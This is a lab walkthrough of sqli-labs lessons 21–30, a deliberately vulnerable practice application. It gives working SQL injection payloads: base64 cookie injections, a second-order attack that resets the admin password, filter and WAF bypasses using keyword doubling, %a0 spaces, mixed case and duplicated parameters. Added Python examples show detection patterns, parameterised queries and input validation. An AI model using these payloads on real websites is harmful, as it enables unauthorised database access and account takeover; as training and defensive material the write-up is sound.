Sqli-labs Advanced Injections (21-30)

Less-21 Cookie Injection- Error Based- complex – string

Log in successfully with username=admin&password=admin.

A cookie is returned; base64-decoding it gives admin, so the cookie is just the logged-in username base64-encoded. Testing through the username shows the statement is closed with (' '), so construct the following payload:

admin') order by 1 #

base64-encoded:

YWRtaW4nKSBvcmRlciBieSAxICM=

Pass the cookie parameter to the page; here this is done with HackBar (a Firefox add-on).

order by 4 produces an error, so there are 3 columns; union query:

admin') and 1=2 union select 1,2,3#
base64:
YWRtaW4nKSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLDIsMyM=

This gives the injection points: 1, 2, 3.

Dump the database name and tables (the later lessons are all taken only as far as this step):

admin') and 1=2 union select group_concat(table_name),database(),version() from information_schema.tables where table_schema=database()#
base64:
YWRtaW4nKSBhbmQgMT0yIHVuaW9uIHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSksZGF0YWJhc2UoKSx2ZXJzaW9uKCkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIw==

Less-22 Cookie Injection- Error Based- Double Quotes – string

Compared with Less-21, the statement is now closed with a double quote; everything else is the same. Modified payload:

admin" and 1=2 union select group_concat(table_name),database(),version() from information_schema.tables where table_schema=database()#
base64:
YWRtaW4iIGFuZCAxPTIgdW5pb24gc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSxkYXRhYmFzZSgpLHZlcnNpb24oKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkj
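The cookie handling in Less-21 and Less-22 is worth looking at from the server's side. The Python below is an added example and is not part of the lab or this write-up: it strictly decodes the base64 cookie values shown above (plus a constructed clean value), flags decoded text containing quote characters, comment markers or SQL keywords, and shows the positive check an application should apply to a username cookie instead of splicing it into a query. The function names, the regular expression and the 32-character username limit are my own choices.

```python
import base64
import binascii
import re
from typing import Optional, Tuple

# Constructed sample cookie values: "normal" is the ordinary login cookie
# ("admin" base64-encoded); the other two are the Less-21 payloads above,
# exactly as the server would receive them in the Cookie header.
SAMPLE_COOKIES = {
    "normal": "YWRtaW4=",
    "order_by": "YWRtaW4nKSBvcmRlciBieSAxICM=",
    "union": "YWRtaW4nKSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLDIsMyM=",
}

# Tokens that have no business inside a username cookie. Case-insensitive,
# because mixed case is the first thing tried against naive filters.
SUSPICIOUS = re.compile(
    r"""(['"()]|--|#|/\*|\b(union|select|order\s+by|information_schema)\b)""",
    re.IGNORECASE,
)


def decode_cookie(value: str) -> Optional[str]:
    """Strictly decode the base64 cookie; None if it is not valid base64/UTF-8."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def inspect_cookie(value: str) -> Tuple[bool, Optional[str]]:
    """Detection view: return (is_suspicious, decoded_text) for one cookie."""
    decoded = decode_cookie(value)
    if decoded is None:
        return True, None  # an undecodable cookie is treated as tampered
    return bool(SUSPICIOUS.search(decoded)), decoded


def user_from_cookie(value: str) -> Optional[str]:
    """Mitigation view: accept only a plain identifier-like username.

    Anything else (quotes, spaces, comment markers) is rejected outright
    rather than 'cleaned'; the query itself should also use bound parameters.
    """
    decoded = decode_cookie(value)
    if decoded is None or not re.fullmatch(r"[A-Za-z0-9_]{1,32}", decoded):
        return None
    return decoded


if __name__ == "__main__":
    for name, cookie in SAMPLE_COOKIES.items():
        flagged, text = inspect_cookie(cookie)
        print(f"{name:9s} flagged={str(flagged):5s} decoded={text!r}")
```

Run as a script it prints one line per sample cookie; the two payload cookies are flagged and rejected by user_from_cookie, the clean one passes both checks.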

Dump the database name and tables.

Less-23 Error Based- no comments

Testing a single quote produces an error.

Try other characters: # (%23).

It is easy to see that # is replaced with an empty string on the backend (there is no gap between the two single quotes).
Next try the -- single-line comment.

The error only reports the single quote in front of limit, which shows the earlier single quote was matched; guess that -- is also replaced with an empty string.
Checking the source confirms it:

So the only option is to close the statement; construct the payload:

http://localhost/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,5),database()'

Less-24 – Second Degree Injections

This is a second-order injection; first audit the files.
login.php (filters the username and password)

login_create.php

pass_change.php

When changing the password, the SQL statement uses the value stored in SESSION, so as long as the username contains a comment marker the rest of the statement can be commented out, ignoring the password check.
For example, an account whose username is admin' -- (with a space after --): the ' is escaped to \' at registration, but it is still stored as ' in the database.
Create the special user admin' --; the password can be anything, here 1234.
Check in the database that it was created successfully.

Change the password.

Checking the database shows that admin's password was successfully changed.
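To make the Less-24 mechanism concrete, here is an added Python/sqlite3 re-creation (not the lab's PHP) of the two steps: registration stores the name admin' -- intact, which is what the escaped INSERT achieves in the lab, and the password change then either splices that stored name into the UPDATE (the lab's behaviour) or binds it as a parameter. The table, user names and passwords are constructed. The attacker even supplies a wrong old password: the vulnerable variant still changes admin's password because the comment marker discards the password clause, while the parameterised variant changes nothing.

```python
import sqlite3
from typing import Tuple

# The write-up's special username, trailing space included.
ATTACKER = "admin' -- "


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the lab's users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'admin')")
    return con


def register(con: sqlite3.Connection, username: str, password: str) -> None:
    """login_create.php escapes the input before the INSERT; a bound parameter
    has the same visible effect: the quote and comment marker land in the
    table unchanged."""
    con.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def change_password_vulnerable(con, session_user: str, old_pw: str, new_pw: str) -> int:
    """Lab-style pass_change: the username comes back out of the session
    unescaped and is spliced straight into the UPDATE. Returns rows changed."""
    sql = "UPDATE users SET password='%s' WHERE username='%s' AND password='%s'" % (
        new_pw, session_user, old_pw)
    # With session_user == "admin' -- " the statement becomes
    #   ... WHERE username='admin' -- ' AND password='...'
    # and everything after -- is a comment.
    cur = con.execute(sql)
    con.commit()
    return cur.rowcount


def change_password_safe(con, session_user: str, old_pw: str, new_pw: str) -> int:
    """Same operation with bound parameters: the stored name is data, not SQL."""
    cur = con.execute(
        "UPDATE users SET password=? WHERE username=? AND password=?",
        (new_pw, session_user, old_pw),
    )
    con.commit()
    return cur.rowcount


def password_of(con: sqlite3.Connection, username: str) -> str:
    row = con.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()
    return row[0]


def demo(vulnerable: bool) -> Tuple[str, str, int]:
    """Register the attacker, attempt a password change with a WRONG old
    password, and report (admin's password, attacker's password, rows changed)."""
    con = make_db()
    register(con, ATTACKER, "1234")
    change = change_password_vulnerable if vulnerable else change_password_safe
    rows = change(con, ATTACKER, "wrong-old-password", "newpass")
    return password_of(con, "admin"), password_of(con, ATTACKER), rows


if __name__ == "__main__":
    print("vulnerable:", demo(vulnerable=True))   # admin's password is replaced
    print("safe:      ", demo(vulnerable=False))  # nothing changes
```

The point of the second-order case is that escaping on the way in is not a substitute for parameter binding on every query that later reads the value back: the stored string is only safe in the statement that was escaped for it.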

Less-25 Trick with OR & AND

Passing or and and, the hint shows that they are filtered.


Bypass by doubling the keyword.


The corresponding symbolic operators also work (&& must be URL-encoded).


Construct the payload:

http://localhost/sqli-labs-master/Less-25/?id=1' anandd 1=2 union select 1,database(),group_concat(table_name) from infoorrmation_schema.tables where table_schema=database() --%20

Less-25a Trick with OR & AND Blind

Compared with 25, error reporting is turned off.
Test whether the filter applies by prefixing the id with or or and; otherwise no different from Less-25.

Less-26 Trick with comments

Looking at the source, a lot is filtered.

Since multi-line comments are filtered they cannot be used in place of spaces; use %a0 instead.
Construct the payload:

http://localhost/sqli-labs-master/Less-26/?id=1'%a0anandd%a01=2%a0union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema=database()),database()'

Less-26a Trick with comments Blind

Compared with Less-26, errors are turned off; test the filtering the same way, otherwise the same.

Confirm that # is filtered:
http://localhost/sqli-labs-master/Less-26a/?id=%231
Confirm that or is filtered:
http://localhost/sqli-labs-master/Less-26a/?id=or1
Confirm that the multi-line comment marker is filtered:
http://localhost/sqli-labs-master/Less-26a/?id=/*1
Confirm that the single-line comment is filtered:
http://localhost/sqli-labs-master/Less-26/?id=--1
Confirm that the slash is filtered:
http://localhost/sqli-labs-master/Less-26/?id=/1
Confirm that the backslash is filtered:
http://localhost/sqli-labs/Less-26/?id=1\
Confirm that the space is filtered, judged from the error:
http://localhost/sqli-labs/Less-26/?id=1' ' '

Less-27 Trick with SELECT & UNION

It is easy to see that this is a single-quote injection and that spaces are filtered.

Check the source.

The filtering is not strict; bypass with mixed case:

http://localhost/sqli-labs-master/Less-27/?id=1'%a0and%a01=2%a0uNion%a0sElect%a01,(sElect%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),database()'

Less-27a Trick with SELECT & UNION Blind

Double-quote injection; same principle.
payload:

http://localhost/sqli-labs-master/Less-27a/?id=1"%a0and%a0(length(database())>8)%a0uNion%a0sElect%a01,(sElect%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),database()"

Less-28 Trick with SELECT & UNION

Look at the source.

union and select are matched with the i (case-insensitive) flag, and \s filters the space between them, but %a0 still gets past it; here the SQL statement is closed with ('').
payload:

http://localhost/sqli-labs-master/Less-28/?id=1')%a0and%a01=2%a0union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),('database()

Less-28a Trick with SELECT & UNION Blind

Same blind principle as above; construct the payload:

http://localhost/sqli-labs-master/Less-28a/?id=1')%a0and%a0(length(database())>8)%a0union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),('database()
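Less-25 through Less-28a all exploit the same defect: the filter removes blacklisted text instead of rejecting the request, and removes it in a single pass, so a doubled keyword, a 0xA0 byte that \s does not match, or a different letter case gets through. The Python below is an added, constructed re-implementation of such a filter, not the lab's source: strip_once behaves like the single-pass blacklist, strip_until_stable shows that repeating to a fixpoint closes the doubling trick but is still a blacklist, and is_valid_id shows the positive validation that settles the matter, because a purely numeric id admits none of the payloads above. The pattern list, its order and the re.ASCII flag (which mimics PCRE's default, where \s does not match 0xA0) are my assumptions.

```python
import re
from typing import List, Optional, Tuple

# Single-pass blacklist in the spirit of the Less-25/26 source (constructed,
# not the lab's PHP). re.ASCII keeps \s to [ \t\n\r\f\v] as PCRE does by
# default, so a 0xA0 byte survives the whitespace pattern.
BLACKLIST: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"or", re.IGNORECASE), ""),
    (re.compile(r"and", re.IGNORECASE), ""),
    (re.compile(r"--"), ""),
    (re.compile(r"#"), ""),
    (re.compile(r"/\*"), ""),
    (re.compile(r"\*/"), ""),
    (re.compile(r"\s", re.ASCII), ""),
]

# Constructed inputs: the Less-25 id value from above and a clean id.
SAMPLES = [
    "1' anandd 1=2 union select 1,database(),group_concat(table_name) "
    "from infoorrmation_schema.tables where table_schema=database() -- ",
    "8",
]


def strip_once(value: str) -> str:
    """Apply every blacklist pattern exactly once, in order."""
    for pattern, replacement in BLACKLIST:
        value = pattern.sub(replacement, value)
    return value


def strip_until_stable(value: str) -> str:
    """Re-apply the blacklist until nothing changes.

    This closes the keyword-doubling hole but is still a deny-list: anything
    the author did not think of (0xA0, alternative operators) still passes.
    """
    while True:
        stripped = strip_once(value)
        if stripped == value:
            return stripped
        value = stripped


def is_valid_id(value: str) -> Optional[int]:
    """Positive validation: the id must be a short decimal integer.

    Returns the integer, or None for anything else. No amount of doubling,
    casing or exotic whitespace produces a string that satisfies this.
    """
    if re.fullmatch(r"[0-9]{1,9}", value):
        return int(value)
    return None


if __name__ == "__main__":
    for sample in SAMPLES:
        print("input        :", sample)
        print("strip_once   :", strip_once(sample))
        print("until_stable :", strip_until_stable(sample))
        print("is_valid_id  :", is_valid_id(sample))
        print()
```

The first sample shows the doubled keywords collapsing back into working SQL after one pass; the same input fails is_valid_id immediately, which is the check the id parameter should have had from the start (with the query itself using bound parameters).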

Less-29 Protection with WAF

Set up the Tomcat environment; entering a single quote produces an error and redirects the page.

https://blog.csdn.net/nzjdsds/article/details/77758824
According to this article, the second value can be used to bypass the WAF.
payload:

http://localhost:8080/sqli-labs-master/Less-29/?id=8&id=8' and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,5),database()'

Less-30 WAF PROTECT

Same principle as Less-29, except the statement is now closed with " instead.
payload:

http://localhost:8080/sqli-labs-master/Less-30/?id=8&id=8" and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,5),database()"
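The Less-29/30 bypass works because two components read the same query string differently: a front end that takes the first occurrence of a repeated parameter (Tomcat's getParameter) checks a clean value, while PHP's $_GET keeps the last occurrence and hands the hostile one to the query. The Python below is an added example, not part of the lab: it parses a constructed URL in the shape used above, shows both readings side by side, and implements the check a WAF or application should make, which is to refuse any request in which a parameter it cares about appears more than once. Function names and the sample URL are my own.

```python
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed URL in the shape of the Less-29 payload above: the same
# parameter twice, a harmless value first and a hostile one second.
SAMPLE_URL = "http://localhost:8080/sqli-labs-master/Less-29/?id=8&id=8%27%20and%201%3D2"
CLEAN_URL = "http://localhost:8080/sqli-labs-master/Less-29/?id=8"


def parse_params(url: str) -> Dict[str, List[str]]:
    """Every occurrence of every parameter, in order of appearance."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)


def first_value(params: Dict[str, List[str]], name: str) -> Optional[str]:
    """What a first-occurrence parser (Tomcat-style) sees."""
    values = params.get(name)
    return values[0] if values else None


def last_value(params: Dict[str, List[str]], name: str) -> Optional[str]:
    """What a last-occurrence parser (PHP $_GET) sees."""
    values = params.get(name)
    return values[-1] if values else None


def polluted_names(params: Dict[str, List[str]]) -> List[str]:
    """Detection: parameter names that occur more than once."""
    return sorted(name for name, values in params.items() if len(values) > 1)


def single_value(params: Dict[str, List[str]], name: str) -> Optional[str]:
    """Mitigation: accept a parameter only if it occurs exactly once, so the
    value the WAF inspected is the value the application will use."""
    values = params.get(name)
    if values is None or len(values) != 1:
        return None
    return values[0]


if __name__ == "__main__":
    for url in (CLEAN_URL, SAMPLE_URL):
        params = parse_params(url)
        print(url)
        print("  first:", first_value(params, "id"))
        print("  last :", last_value(params, "id"))
        print("  duplicated:", polluted_names(params))
        print("  accepted  :", single_value(params, "id"))
```

The front end and back end each see a consistent request; the disagreement only becomes visible when both readings are placed next to each other, which is why duplicate parameters are worth logging even when the first value looks harmless.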